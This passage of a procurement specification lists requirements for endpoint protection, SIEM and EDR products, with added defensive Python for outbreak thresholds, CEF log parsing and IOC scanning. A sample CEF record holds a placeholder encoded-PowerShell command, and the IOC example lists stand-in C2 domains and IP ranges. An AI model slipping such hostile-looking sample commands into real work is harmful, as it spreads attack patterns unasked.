update 1.6) 64-bit
 Astra Linux Special Edition RUSB.10015-01 (operational
update 1.7) 64-bit
 Astra Linux Common Edition (operational update 2.12) 64-bit
 ALT SP Server 10 64-bit
 ALT Server 10 64-bit
 ALT Server 9.2 64-bit
 ALT 8 SP Server (LKNV.11100-01) 64-bit
 ALT 8 SP Server (LKNV.11100-02) 64-bit
 ALT 8 SP Server (LKNV.11100-03) 64-bit
 Oracle Linux 7 64-bit
 Oracle Linux 8 64-bit
 Oracle Linux 9 64-bit
 RED OS 7.3 Server 64-bit
 RED OS 7.3 Certified Edition 64-bit
 ROSA COBALT 7.9 64-bit

2. The proposed solution must support the following database servers:
Windows:
 Microsoft SQL Server 2012 Express 64-bit
 Microsoft SQL Server 2014 Express 64-bit
 Microsoft SQL Server 2016 Express 64-bit
 Microsoft SQL Server 2017 Express 64-bit
 Microsoft SQL Server 2019 Express 64-bit
 Microsoft SQL Server 2014 (all editions) 64-bit
 Microsoft SQL Server 2016 (all editions) 64-bit
 Microsoft SQL Server 2017 (all editions) on Windows 64-bit
 Microsoft SQL Server 2017 (all editions) on Linux 64-bit
 Microsoft SQL Server 2019 (all editions) on Windows 64-bit
(requires additional actions)
 Microsoft SQL Server 2019 (all editions) on Linux 64-bit
(requires additional actions)
 Microsoft Azure SQL Database
 All supported SQL Server editions in Amazon RDS and
Microsoft Azure cloud platforms
 MySQL 5.7 Community 32-bit/64-bit
 MySQL Standard Edition 8.0 (release 8.0.20 and later)
32-bit/64-bit
 MySQL Enterprise Edition 8.0 (release 8.0.20 and later)
32-bit/64-bit
 MariaDB 10.1 (build 10.1.30 and later) 32-bit/64-bit
 MariaDB 10.3 (build 10.3.22 and later) 32-bit/64-bit
 MariaDB 10.4 (build 10.4.26 and later) 32-bit/64-bit
 MariaDB 10.5 (build 10.5.17 and later) 32-bit/64-bit
 MariaDB Server 10.3 32-bit/64-bit with InnoDB storage engine
 MariaDB Galera Cluster 10.3 32-bit/64-bit with InnoDB storage
engine
 PostgreSQL 13.x 64-bit
 PostgreSQL 14.x 64-bit
 Postgres Pro 13.x (all editions)
 Postgres Pro 14.x (all editions)
Linux:
 MySQL 5.7 Community 32-bit/64-bit
 MySQL 8.0 32-bit/64-bit
 MariaDB 10.4 (build 10.4.26 and later) 32-bit/64-bit
 MariaDB 10.5 (build 10.5.17 and later) 32-bit/64-bit
 MariaDB Galera Cluster 10.3 32-bit/64-bit with InnoDB storage
engine
 PostgreSQL 13.x 64-bit
 PostgreSQL 14.x 64-bit
 PostgreSQL 15.x 64-bit
 Postgres Pro 13.x 64-bit (all editions)
 Postgres Pro 14.x 64-bit (all editions)
 Postgres Pro 15.x 64-bit (all editions)
 Platform V Pangolin 5.4.0 64-bit

3. The proposed solution must support the following virtual platforms:
Windows:
 VMware vSphere 6.7
 VMware vSphere 7.0
 VMware Workstation 16 Pro
 Microsoft Hyper-V Server 2012 64-bit
 Microsoft Hyper-V Server 2012 R2 64-bit
 Microsoft Hyper-V Server 2016 64-bit
 Microsoft Hyper-V Server 2019 64-bit
 Microsoft Hyper-V Server 2022 64-bit
 Citrix XenServer 7.1 LTSR
 Citrix XenServer 8.x
 Parallels Desktop 17
 Oracle VM VirtualBox 6.x
Linux:
 VMware vSphere 6.7
 VMware vSphere 7.0
 VMware vSphere 8.0
 VMware Workstation 16 Pro
 VMware Workstation 17 Pro
 Microsoft Hyper-V Server 2012 64-bit
 Microsoft Hyper-V Server 2012 R2 64-bit
 Microsoft Hyper-V Server 2016 64-bit
 Microsoft Hyper-V Server 2019 64-bit
 Microsoft Hyper-V Server 2022 64-bit
 Citrix XenServer 7.1 LTSR
 Citrix XenServer 8.x
 Parallels Desktop 17
 Oracle VM VirtualBox 6.x
 Oracle VM VirtualBox 7.x
 Kernel-based Virtual Machine (all Linux operating systems
supported by Administration server)

4. The proposed solution must enable the installation of anti-malware
software from a single distribution package.

5. The proposed solution must have customizable installation profiles
depending on the number of protected nodes.

6. The proposed solution must support IPv6 addresses.

7. The proposed solution must support two-step verification
(authentication).

8. The proposed solution must be able to read information from Active
Directory to obtain data about computer accounts in the organization.

9. The proposed solution must include a built-in web console for the
management of the endpoints, which should not require any additional
installation.

10. The proposed solution’s web management console should be
straightforward to use and must support touch screen devices.

11. The proposed solution must automatically distribute computer accounts
to administration groups when new computers appear on the network. It
must provide the ability to set transfer rules according to IP address,
type of operating system and location in Active Directory Organizational
Units.

12. The proposed solution must provide for the centralized installation,
update and removal of anti-malware software, together with centralized
configuration, administration, and the viewing of reports and statistical
information about its operation.

13. The proposed solution must feature the centralized removal (manual
and automatic) of incompatible applications from the administration
center.

14. The proposed solution must provide flexible methods for anti-malware
agent installation: RPC, GPO, an administration agent for remote
installation and the option to create a standalone installation package
for local installation.

15. The proposed solution must enable the remote installation of anti-
malware software with the latest anti-malware databases.
16. The proposed solution must enable the automatic update of anti-
malware software and anti-malware databases.

17. The proposed solution must have automatic search facilities for
vulnerabilities in applications and in the operating system on protected
machines.

18. The proposed solution must enable the management of a component
prohibiting the installation and/or running of programs.

19. The proposed solution must enable the management of a component
controlling work with external I/O devices.

20. The proposed solution must enable the management of a component
controlling user activity on the internet.

21. The proposed solution must allow for the testing of downloaded updates
by means of the centralized administration software prior to distributing
them to client machines, and the delivery of updates to user workplaces
immediately after receiving them.

22. The proposed solution must be able to automatically deploy protection
to virtual infrastructures based on the VMware ESXi, Microsoft Hyper-V or
Citrix XenServer virtualization platform or hypervisor.

23. The proposed solution must enable the creation of a hierarchy of
administration servers at an arbitrary level and the ability to centrally
manage the entire hierarchy from the upper level.

24. The proposed solution must support Managed Services Mode for
administration servers, so that logically isolated administration server
instances can be set up for different users and user groups.

25. The proposed solution must give access to the anti-malware security
vendor’s cloud services via the administration server.

26. The proposed solution must include the automatic distribution of
licenses to client computers.

27. The proposed solution must be able to perform inventories of software
and hardware installed on user computers.

28. The proposed solution must have a notification mechanism to inform
users about events in the installed anti-malware software and its settings,
and to distribute notifications about events via email.

29. The proposed solution must enable the centralized installation of third-
party applications on all or selected computers.

30. The proposed solution must have the ability to specify any computer in
the organization as a center for relaying updates and installation
packages, in order to reduce the network load on the main
administration server system.

31. The proposed solution must have the ability to specify any computer in
the organization as a center for forwarding anti-malware agent events
from the selected group of client computers to the centralized
administration server, in order to reduce the network load on the main
administration server system.

32. The proposed solution must be able to generate graphical reports for
anti-malware software events, and data about the hardware and
software inventory, licensing, etc.

33. The proposed solution must be able to export reports to PDF and
XML files.

34. The proposed solution must provide the centralized administration of
backup storages and quarantine on all network resources where the
anti-malware software is installed.

35. The proposed solution must provide the creation of internal accounts to
authenticate administrators on the administration server.

36. The proposed solution must provide the creation of an administration
system backup copy with the help of integrated administration system
tools.

37. The proposed solution must support Windows Failover Cluster.

38. The proposed solution must have a built-in clustering feature.

39. The proposed solution must include some form of system to control
virus epidemics.

40. The proposed solution must include Role Based Access Control
(RBAC), and this must allow restrictions to be replicated throughout the
management servers in the hierarchy.

41. The proposed solution’s management server must include pre-defined
security roles for the Auditor, Supervisor and Security Officer.

42. The proposed solution must have the ability to manage mobile devices
through remote commands.

43. The proposed solution must have ability to delete downloaded updates.

44. The proposed solution must allow Administration Server updates to be
managed from the application interface.

45. The proposed solution must enable the selection of an update agent for
client computers based on a network analysis.

46. The proposed solution must clearly show information about the
distribution of vulnerabilities across managed computers.

47. The proposed solution’s management server interface must support the
Arabic language.

48. The proposed solution’s management server must maintain a revision
history of the policies, tasks, packages and management groups created,
so that modifications to a particular policy/task can be reviewed.
49. The proposed solution’s management server must have functionality to
create multiple profiles within a protection policy with different protection
settings that can be simultaneously active on a single/multiple devices
based on the following activation rules:
 Device status
 Tags
 Active directory
 Device owners
 Hardware

50. The proposed solution must support the following notification delivery
channels:
 Email
 Syslog
 SMS
 SIEM

51. The proposed solution must have the ability to define an IP address
range, to limit client traffic towards the management server based on
time and speed.

52. The proposed solution must have the ability to perform inventory on
scripts and .dll files.

53. The proposed solution must have the ability to tag/mark computers
based on:
 Network Attributes
o Name
o Domain and/or Domain Suffix
o IP address
o IP address to management server
 Location in Active Directory
o Organizational Unit
o Group
 Operating System
o Type and Version
o Architecture
o Service Pack number
 Virtual Architecture
 Application registry
o Application name
o Application version
o Manufacturer

54. The proposed solution must have the ability to create/define settings
based on a computer’s location in the network, rather than the group to
which it belongs in the management server.

55. The proposed solution must have the functionality to add a
unidirectional connection mediator between the management server
and endpoints connecting over the internet/public network.

56. The proposed solution must allow the administrator to define, in
policy/profile settings, a rule that automatically triggers a virus scan
task when a certain number of viruses are detected within a defined
period of time. The values for the number of viruses and the period must
be configurable.
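The rule in item 56 (a scan task fires when a configurable number of detections occurs within a configurable period) is a sliding-window threshold, and the easiest way to check what a bidder means by it is to run candidate values against a known sequence of detections. The Python below is an added example written for this page, not vendor code: the detection records are constructed, and the choice to clear the window after a trigger (one alert per outbreak rather than one per subsequent detection) is an assumption of the example, not something the requirement states.

```python
from collections import deque

# Constructed sample detections: (unix_time_seconds, host, detected_object).
# These are not real events; they exist only to exercise the rule below.
DETECTIONS = [
    (0,    "ws-101", "Trojan.Generic"),
    (30,   "ws-102", "Trojan.Generic"),
    (60,   "ws-103", "Trojan.Generic"),   # third hit inside 300 s -> outbreak
    (1000, "ws-104", "Adware.Foo"),
    (1400, "ws-105", "Adware.Foo"),       # the 1000 s hit has aged out by now
    (1600, "ws-106", "Adware.Foo"),       # only two hits inside any 300 s window
    (2000, "srv-01", "Worm.Bar"),
    (2100, "srv-02", "Worm.Bar"),
    (2200, "srv-03", "Worm.Bar"),         # second outbreak
]


def outbreak_triggers(detections, threshold, window_seconds):
    """Return the times at which the outbreak rule fires.

    A trigger fires when `threshold` detections fall inside a sliding window
    of `window_seconds` ending at the newest detection. After firing, the
    window is cleared (example's assumption) so that one outbreak yields one
    trigger instead of one per further detection.
    """
    if threshold < 1 or window_seconds <= 0:
        raise ValueError("threshold must be >= 1 and window_seconds > 0")
    window = deque()          # timestamps of detections still inside the window
    triggers = []
    for ts, _host, _obj in sorted(detections, key=lambda d: d[0]):
        window.append(ts)
        # Evict detections older than the window, measured from the newest one.
        while window and ts - window[0] > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            triggers.append(ts)
            window.clear()
    return triggers


def hosts_in_outbreak(detections, trigger_time, window_seconds):
    """Hosts whose detections fall inside the window that caused `trigger_time`;
    these are the first targets for the automatically started scan task."""
    return sorted({host for ts, host, _ in detections
                   if trigger_time - window_seconds <= ts <= trigger_time})


if __name__ == "__main__":
    for t in outbreak_triggers(DETECTIONS, threshold=3, window_seconds=300):
        print(f"outbreak at t={t}s on {hosts_in_outbreak(DETECTIONS, t, 300)}")
```

Running it with threshold 3 and a 300-second window fires at t=60 and t=2200 but not for the adware hits, which never accumulate three inside one window; with a 100-second window and threshold 2 it fires at t=30 and t=2100 instead, which is the kind of sensitivity check worth doing before settling on production values.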

57. The proposed solution must have a customizable dashboard generating
and displaying real time statistics for endpoints.

58. The proposed solution must allow the administrator to customize
reports.

59. The proposed solution must have the functionality to detect non-
persistent virtual machines and automatically delete them and their
related data from the management server when powered off.

60. The proposed solution must enable the administrator to set a period
after which a computer not connected to the management server, and
its related data are automatically deleted from the server.

61. The proposed solution must allow the administrator to create
categories/groups of applications based on:
 Application Name
 Application Path
 Application Metadata
 Application Digital certificate
 Vendor pre-defined application categories
 SHA
 Reference computers
to allow/deny their execution on endpoints.

62. The proposed solution must allow the administrator to define different
status change conditions for groups of endpoints in the management
server.

63. The proposed solution must allow the administrator to add custom/3rd
party endpoint management tools into the management server.

64. The proposed solution must have a built-in feature/module to remotely
collect the data needed for troubleshooting from the endpoints, without
requiring physical access.

65. The proposed solution must allow the administrator to create a
Connection Tunnel between a remote client device and the
management server if the port used for connection to the management
server is not available on the device.

66. The proposed solution must have built-in functionality to remotely
connect to the endpoint using Windows Desktop Sharing technology. In
addition, the solution must be able to maintain auditing of administrator
actions during the session.

67. The proposed solution must have a feature to create a structure of
administration groups using the Groups hierarchy, based on the
following data:
 structures of Windows domains and workgroups
 structures of Active Directory groups
 contents of a text file created manually by the administrator

68. The proposed solution must be able to retrieve information about the
equipment detected during a network poll. The resulting inventory
should cover all equipment connected to the organization's network.
Information about the equipment should update after each new network
poll. The list of detected equipment should cover the following:
 devices
 mobile devices
 network devices
 virtual devices
 OEM components
 computer peripherals
 connected devices
 VoIP phones
 network repositories
The administrator must be able to add new devices to the equipment list
manually or edit information about equipment that already exists on the
network.
‘Device is Written Off’ functionality must be available, so that such
devices are not displayed in the equipment list.

69. The proposed solution must incorporate a single distribution/relay agent
to support at least 10,000 endpoints for the delivery of protection,
updates, patches and installation packages to remote sites.

70. The proposed solution must incorporate a single distribution/relay agent
to relay/transfer or proxy threat reputation requests from endpoints to
the management server.

71. The proposed solution must support the download of differential files
rather than full update packages.

72. The proposed solution must support an open API and include guidelines
for integration with 3rd party external systems.

73. The proposed solution must include a built-in tool to perform remote
diagnostics and collect troubleshooting logs without requiring physical
access to the computer.

74. The proposed solution must include Role Based Access Control
(RBAC) with customizable predefined roles.

75. The proposed solution’s primary/parent management server must be
able to relay updates and cloud reputation services.

76. The proposed solution’s reports must include information about each
threat and the technology that detected it.

77. The proposed solution report must include details about which endpoint
protection components are, or are not, installed on client devices,
regardless of the protection profile applied/existing for these devices.

78. The proposed solution’s primary management server must be able to
retrieve detailed information, such as health status reports, on managed
endpoints from the secondary management servers.

79. The proposed solution must include the option for the customer to either
deploy an on-premises management console or use the vendor-
provided cloud-based management console.

80. The proposed solution must be able to integrate with the vendor’s
cloud-based management console for endpoint management at no
additional cost.

81. The proposed solution must enable swift migration from the on-
premises management console to the vendor cloud-based management
console.

82. The proposed solution’s agent must include support for cloud-based
deployment via:
 Amazon Web Services
 Microsoft Azure

83. The proposed solution must provide anti-malware database update
mechanisms including:
 Multiple ways of updating, including global communication
channels over the HTTPS protocol, a shared resource on the local
network and removable media.
 Verification of the integrity and authenticity of updates by
means of an electronic digital signature.

84. The proposed solution must support Single Sign On (SSO) using NTLM
and Kerberos.

85. The proposed solution must allow monitoring of vulnerabilities present
on managed devices.

86. The proposed solution should allow advanced attacks to be detected
and rooted out, root cause analysis to be performed with a visualized
threat development chain graph, and drill-down to details for further
review.

Architecture and design (Correlation engine)

1. Collection, normalization, aggregation, filtration, enrichment, mutation,
correlation, and storage of security events.

2. Integration with different log formats, with the ability to create user
custom normalizers (parsers).

3. Real-time monitoring, analysis, and correlation of security events.

4. Retroscan (the historical correlation) of security events.

5. Automated enrichment of security events, which must be available on
collector and correlator components, with the following actionable
information:
 Threat intelligence data feeds.
 Threat intelligence lookup services.
 Information about assets and infrastructure.
 Information about software vulnerabilities and software installed
on endpoints.
 Information about users (accounts) from Microsoft® Active
Directory.
 Information about FQDN or IP from the DNS system.
 Information from user-created dictionaries.

6. A web-based user interface for central management, incident
investigation and response.

7. SQL-like event search with auto-complete.

8. Encrypted secure communications between all components.

9. Virtual environment and bare-metal deployment options.

10. Deployment in a distributed IT infrastructure.

11. Multitenancy.

12. Role-based access control.

13. Customizable dashboards and reports.

14. Automated asset discovery and inventory, with or without agent
software.

15. A microservice software architecture.

16. The solution must support the ability to write the log of the installation
process to a file.

Functional requirements (Correlation engine)

1. The solution must support raw data collection. This must be a
configurable option, which can be configured independently for each
data source.

2. The solution must support both active and passive log collection
mechanisms from different types of equipment and systems.

3. The solution must support normalization into a unified data model to
standardize events. The data model must be documented.

4. The solution must support the following log formats (i.e., normalizers,
parsers) ‘out-of-the-box’:
 JSON
 CEF (Common Event Format)
 Regexp (Regular Expression)
 Syslog (as per RFC3164 and RFC5424)
 CSV (with custom delimiter)
 Key-value
 XML
 NetFlow v5
 NetFlow v9
 Sflow5
 Ipfix
 SQL

5. The solution must support the following log transport mechanisms (i.e.,
connectors) ‘out-of-the-box’:
 Internal
 TCP
 UDP
 Netflow
 Sflow
 NATS-jetstream
 Kafka
 HTTP
 SQL (MSSQL, MySQL, PostgreSQL, CockroachDB, SQLite3,
Oracle, Firebird)
 File
 1C-log
 1C-xml
 Diode
 FTP
 NFS
 WMI (remote Windows Event Log collection)
 WEC (local Windows Event Log collection)
 SNMP
 SNMP-trap
 KATA/KEDR
 VMware

6. The solution must support custom parser creation and modification via
a graphical web interface. The creation and modification of custom
parsers should not require any programming skills, or the mandatory
involvement of the solution vendor.

7. Custom parser creation must include highlighting the log example (at
least for regex parsers) and fields mapping.

8. The solution must support two or more levels of additional parsers.

9. The solution must support a graphical view of the parser structure (tree
structure).

10. All parsers and connectors provided by the vendor, and those created
by the user, must be editable and open to modification.

11. The solution must support secure encrypted communications channels
with data sources for data collection purposes (where data sources
support this functionality).

12. The solution must operate with an unlimited number of data sources.

13. The solution must support data source monitoring, and notification in
the case of low EPS (Events Per Second).

14. The solution must support automatic updating of normalizers via the
Internet and via an update mirror.

15. The solution must support the ability to convert hex, base64 and
base64url binary values at the event collection stage.

16. The solution must support the selection of several conditions for
switching between different levels of parsers.

17. The solution must support the ability to send events to third-party
systems in CEF format.
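Items 3, 4 and 17 of this section ask for normalization of CEF and syslog input into a documented data model and for forwarding events back out in CEF. The Python below is an added example written for this page, not vendor code: it parses an RFC 5424 frame whose MSG part carries a CEF record, honours the CEF escapes for '|', '\' and '=' (the place most home-grown parsers get wrong), maps the result onto a small unified event model, and serializes it back to CEF so that a forwarded record round-trips. The two sample records and the field names of the unified model are constructed for the example.

```python
import re

# Constructed sample records (not real product output): a bare CEF event and
# an RFC 5424 syslog frame carrying that same event as its MSG part.
SAMPLE_CEF = (r"CEF:0|Acme|Net\|Guard|1.0|100|Blocked C2 beacon|8|"
              r"src=10.0.0.5 dst=203.0.113.7 suser=CORP\\jdoe msg=cmd\=powershell -enc AAA")
SAMPLE_SYSLOG = "<134>1 2024-07-03T10:15:00Z fw01 netguard 1234 - - " + SAMPLE_CEF

# RFC 5424: <PRI>VERSION SP TIMESTAMP SP HOSTNAME SP APP-NAME SP PROCID SP MSGID
# SP STRUCTURED-DATA [SP MSG]. Structured data is captured but not parsed here.
RFC5424 = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<ver>\d+) (?P<ts>\S+) (?P<host>\S+) (?P<app>\S+) "
    r"(?P<procid>\S+) (?P<msgid>\S+) (?P<sd>-|\[.*?\])(?: (?P<msg>.*))?$", re.S)
# A CEF extension key starts a new pair only at the start or after whitespace.
CEF_KEY = re.compile(r"(?:^|\s)([A-Za-z][A-Za-z0-9_.-]*)=")


def split_cef_header(text):
    """Split the seven pipe-delimited CEF header fields, honouring the
    backslash escapes for '|' and '\\'. Returns (fields, extension_text)."""
    fields, cur, i = [], [], 0
    while i < len(text) and len(fields) < 7:
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):      # escaped char: take it literally
            cur.append(text[i + 1])
            i += 2
        elif ch == "|":
            fields.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(ch)
            i += 1
    if len(fields) < 7 or not fields[0].startswith("CEF:"):
        raise ValueError("not a well-formed CEF record")
    return fields, text[i:]


def unescape_ext(value):
    # In the extension part '\=', '\\', '\n' and '\r' are the defined escapes.
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "r": "\r"}.get(m.group(1), m.group(1)), value)


def parse_cef_extension(ext):
    """Parse 'key=value key=value' where values may contain spaces and escaped
    '=' signs: a value runs until the next unescaped 'key=' token."""
    out, keys = {}, list(CEF_KEY.finditer(ext))
    for idx, m in enumerate(keys):
        end = keys[idx + 1].start() if idx + 1 < len(keys) else len(ext)
        out[m.group(1)] = unescape_ext(ext[m.end():end].strip())
    return out


def normalize_cef(line):
    """Map a CEF record onto a small unified event model (field names are the
    example's own; a real deployment uses the documented data model)."""
    fields, ext_text = split_cef_header(line)
    ext = parse_cef_extension(ext_text)
    return {
        "cef_version": int(fields[0][4:]),
        "device_vendor": fields[1], "device_product": fields[2],
        "device_version": fields[3], "signature_id": fields[4],
        "name": fields[5], "severity": fields[6],
        "source_ip": ext.get("src"), "destination_ip": ext.get("dst"),
        "user": ext.get("suser") or ext.get("duser"),
        "message": ext.get("msg"),
        "extension": ext,
    }


def normalize_syslog(line):
    """Parse the RFC 5424 header; if the payload is CEF, normalize that too."""
    m = RFC5424.match(line)
    if not m:
        raise ValueError("not an RFC 5424 frame")
    pri, msg = int(m["pri"]), m["msg"] or ""
    return {
        "facility": pri // 8, "syslog_severity": pri % 8,
        "timestamp": m["ts"], "host": m["host"], "app": m["app"],
        "event": normalize_cef(msg) if msg.startswith("CEF:") else {"message": msg},
    }


def _esc_header(v):
    return v.replace("\\", "\\\\").replace("|", "\\|")


def _esc_ext(v):
    return v.replace("\\", "\\\\").replace("=", "\\=").replace("\n", "\\n").replace("\r", "\\r")


def to_cef(event):
    """Serialize a unified event back to CEF for forwarding to a third-party
    system, re-applying the escapes so that the record round-trips."""
    head = "|".join(_esc_header(str(event[k])) for k in
                    ("device_vendor", "device_product", "device_version",
                     "signature_id", "name", "severity"))
    ext = " ".join(f"{k}={_esc_ext(v)}" for k, v in event["extension"].items())
    return f"CEF:{event['cef_version']}|{head}|{ext}"
```

When evaluating a bidder's parser, feed it exactly these kinds of records: a product name containing an escaped pipe, a user name containing a backslash, and a message containing an escaped equals sign and spaces. A parser that splits the header on every '|' or the extension on every space will mis-field all three.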

18. The solution must support sending all raw events for additional
normalization.

19. The solution must support the ability to collect events of different
formats by a single collector.

20. The solution must support the ability to create custom fields in
normalizers.

21. The solution must support the ability to send test events to the system.

22. The solution must support configuration backup options.

23. The solution must support restoring the configuration from a backup
and importing/exporting the configuration parameters.

Architecture and design (EDR Server and EDR agents)

1. EDR solution must be fully integrated with the XDR solution.

2. The XDR solution must have a unified console for administrators and analysts.

3. The EDR agent must be integrated with the Endpoint Protection application
(single agent).

4. EDR should support standalone agent installation (without the Endpoint
Protection application).

5. The solution must support installation in VMware ESXi and KVM
environments.

6. The solution must support collecting, processing and analyzing endpoint
telemetry from the following types of operating systems: Windows,
Linux, macOS.

7. The list of supported Linux distributions must include at least: Ubuntu,
Red Hat Enterprise Linux, CentOS, Debian, Oracle, SUSE Linux
Enterprise Server, Amazon Linux, EulerOS.

8. The solution must support a multi-tenancy scenario with multiple Analysis
Centers connected to a Master Analysis Center.
9. The solution must support aggregating and analyzing information from
up to 450,000 endpoints.

10. The solution must support a distributed implementation schema with
centralized management (multiple Analysis Centers with a single
administration point).

11. The solution must support a high-availability architecture for Analysis
Centers.

12. The solution must provide web interface for management and analytics
(Incident related data, System status and health check data, Settings,
etc.).

13. The solution must provide an API for at least the following purposes:
 API to execute remediation/response actions on endpoints.
 API for tagged endpoint telemetry retrieval by 3rd party systems.
 API for application alert information retrieval by 3rd party systems.

14. Solution must provide an option to store endpoint telemetry data for a
necessary period (30 days or more). Local storage must be extendable
if required to accommodate data.

Functional requirements (EDR Server and EDR agents)

1. The solution must be able to use the vendor’s cloud-based Threat
Intelligence services to obtain the reputation of objects, remote hostnames
and IPs, to check binary objects’ certificate information, and more.

2. The vendor must be able to provide a full private replica of the cloud
Threat Intelligence services for on-premises installation if necessary.

3. The private Threat Intelligence cloud must have an option to add or
redefine custom reputation data for objects and web resources.

4. The private Threat Intelligence cloud must support a data diode
(unidirectional gateway) scenario for reputation data and other types of
information updates.

5. Reputation data in the on-premises Threat Intelligence services must be
automatically updated with the analytical information obtained from the
solution. This allows threat data to be enriched on all solutions connected
to the local replica of the Threat Intelligence services.

6. The investigative functions must include historical data of primary
endpoint events (telemetry) to determine the changes that occurred.

7. The solution user (security analyst) must have an automated tool to obtain
a list of files stored in a specified folder on an endpoint, a list of
processes running on a given endpoint, a process memory dump, a full
memory dump, a disk image, registry keys, NTFS metafiles and an autorun
points list.

8. Endpoint telemetry data must contain information about account
activities, network communications, file system changes, file attribute
modifications, registry changes, interactive input data, Windows event
log information and Linux properties information, among other types of
data.

9. The solution must provide visibility into where else in your organization
particular threats (objects) may exist.

10. The solution must be able to detect advanced malware, and must
discover zero-day malware that signature-based solutions miss.

11. The solution should support delivery of alert data and monitoring
information via syslog.

12. The solution should include an Automated Malware Analysis
subsystem to detonate suspicious objects within a controlled virtual
environment to assess their threat level.

13. The solution’s Automated Malware Analysis subsystem must use multiple
virtual client operating systems of x64 and x86 architectures. The list
must contain at least the following: Windows 10, Windows 7 64-bit,
Windows XP 32-bit, CentOS 7.8 64-bit.

14. The solution’s Automated Malware Analysis subsystem must provide the
ability to prepare and use customized VM images for dynamic malware
analysis.

15. The Automated Malware Analysis subsystem must be able to provide
the following information to the analyst:
 Comprehensive host modification report available after
execution in the VM
 Copy of the malware binary(s)
 Network metadata identifying the locations to which the malware
attempts to communicate
 Importance of the information
 Screenshots of the desktop activity

16. The solution’s Automated Malware Analysis subsystem must provide
output to the analyst which includes the following: a graphical
representation of the process tree, data on web traffic and DNS
communications, and more.

17. The Automated Malware Analysis subsystem must have an option to use a
dedicated Internet connection to enable analysis of outgoing
communications and of downloaded extra malicious modules.

18. The Automated Malware Analysis subsystem must be able to simulate
end-user actions to force the execution of malware that relies on triggers
from the end user, such as a mouse click, for better analysis of the
malware objects.

19. The solution’s Automated Malware Analysis subsystem must be able to
hide itself from sandbox-evading malware during object analysis.

20. The solution’s Automated Malware Analysis subsystem must be able to
process objects manually submitted via the solution management interface.

21. Verdicts obtained via the Automated Malware Analysis subsystem must
enrich the local reputation database used by the EDR solution, ATP
solution and Endpoint Protection applications.

22. Endpoint Protection solution detections must provide additional
information to the telemetry database for the EDR solution, and this data
must be searchable via the analyst console.

23. The EDR solution agent must have self-defense functionality to protect it
from removal.

24. The solution must have the capability to run an IOC scan inside the
centrally collected endpoint telemetry database.

25. The solution must have the capability to force run an IOC scan across all
hosts with installed agents.

26. The EDR solution should provide the ability to execute YARA scans on
endpoints.

27. EDR solution must provide search interface with rich functionality for
analyst to build sophisticated lookup requests against telemetry
database.
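Items 9, 24, 25 and 27 above describe scanning the centrally collected telemetry for indicators and answering where else in the organization an object appears. The Python below is an added example written for this page, not the product's implementation; the indicator set and the telemetry records are constructed. It shows the normalization an IOC scan has to get right before set membership is meaningful: hashes compared case-insensitively, IP indicators matched as CIDR ranges, and domains matched by suffix on a dot boundary so that "notevil.example" does not match the indicator "evil.example".

```python
import ipaddress
from collections import defaultdict

# Constructed indicators (not from any real feed). The hash is deliberately
# given in upper case to show that matching must be case-insensitive.
IOCS = {
    "sha256": ["DEADBEEF" * 8],
    "ipv4": ["198.51.100.0/24", "203.0.113.7"],
    "domain": ["evil.example", "c2.test"],
}

# Constructed endpoint telemetry in the shape an EDR server would hold it.
TELEMETRY = [
    {"id": 1, "host": "ws-101",  "type": "process", "sha256": "deadbeef" * 8},
    {"id": 2, "host": "ws-102",  "type": "process", "sha256": "DEADBEEF" * 8},
    {"id": 3, "host": "ws-102",  "type": "dns",     "domain": "update.evil.example."},
    {"id": 4, "host": "srv-db1", "type": "net",     "dst_ip": "198.51.100.23"},
    {"id": 5, "host": "srv-db1", "type": "net",     "dst_ip": "192.0.2.10"},
    {"id": 6, "host": "ws-103",  "type": "dns",     "domain": "notevil.example"},
]


def compile_iocs(iocs):
    """Pre-process the indicator set once so the per-record scan stays cheap."""
    return {
        "sha256": {h.lower() for h in iocs.get("sha256", [])},
        "ipv4": [ipaddress.ip_network(n, strict=False) for n in iocs.get("ipv4", [])],
        "domain": [d.lower().strip(".") for d in iocs.get("domain", [])],
    }


def domain_hit(name, ioc_domains):
    """Return the indicator that `name` equals or is a subdomain of, else None.
    The '.' boundary is what keeps 'notevil.example' from matching 'evil.example'."""
    name = name.lower().rstrip(".")          # tolerate a trailing root dot
    for d in ioc_domains:
        if name == d or name.endswith("." + d):
            return d
    return None


def ip_hit(addr, networks):
    """Return the CIDR containing `addr`, else None (unparseable input never matches)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net in networks:
        if ip.version == net.version and ip in net:
            return str(net)
    return None


def scan_telemetry(records, compiled):
    """Scan collected telemetry against the compiled IOC set.
    Returns a list of (host, ioc_type, ioc_value, record_id) hits."""
    hits = []
    for rec in records:
        h = (rec.get("sha256") or "").lower()
        if h and h in compiled["sha256"]:
            hits.append((rec["host"], "sha256", h, rec["id"]))
        net = ip_hit(rec.get("dst_ip", ""), compiled["ipv4"])
        if net:
            hits.append((rec["host"], "ipv4", net, rec["id"]))
        dom = rec.get("domain") and domain_hit(rec["domain"], compiled["domain"])
        if dom:
            hits.append((rec["host"], "domain", dom, rec["id"]))
    return hits


def spread(hits):
    """Answer 'where else does this indicator appear?': indicator -> sorted hosts."""
    by_ioc = defaultdict(set)
    for host, kind, value, _rec in hits:
        by_ioc[(kind, value)].add(host)
    return {k: sorted(v) for k, v in by_ioc.items()}


if __name__ == "__main__":
    for ioc, hosts in spread(scan_telemetry(TELEMETRY, compile_iocs(IOCS))).items():
        print(ioc, "->", ", ".join(hosts))
```

Against the constructed data the scan reports the hash on both ws-101 and ws-102 (the second only because of the case-folding), the C2 domain on ws-102 via its subdomain, and the CIDR hit on srv-db1, while records 5 and 6 correctly stay clean. Item 25, the forced on-host scan, is the same matching logic run by the agent against live artifacts rather than against the central database.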

28. EDR solution must provide means of isolating machine from the rest of
the network in case of emergency, while preserving controlled
communication with agents’ administration and control server.

29. EDR solution must provide means of remote remediation via agent (files
deletion and quarantine, process kill, preventing files from
running/opening, etc.)

30. The solution must have integration with Threat Intelligence analytical
portal which contains not only reputation data, but also connections
between internet resources, objects, etc.

31. The solution must be capable of detecting incoming or outgoing
connections to C&C infrastructure.

32. Alerts on detections must be automatically enriched with relevant
context data such as descriptions, classes of threats, geographical
prevalence, etc.

33. The solution should provide the ability to tag critical resources so that
they can be protected using different rules.

34. The solution’s Automated Malware Analysis subsystem should be able to
examine objects using multiple subsystem server instances to improve
analysis time.

35. Multiple Analysis Centers should be able to connect to a single
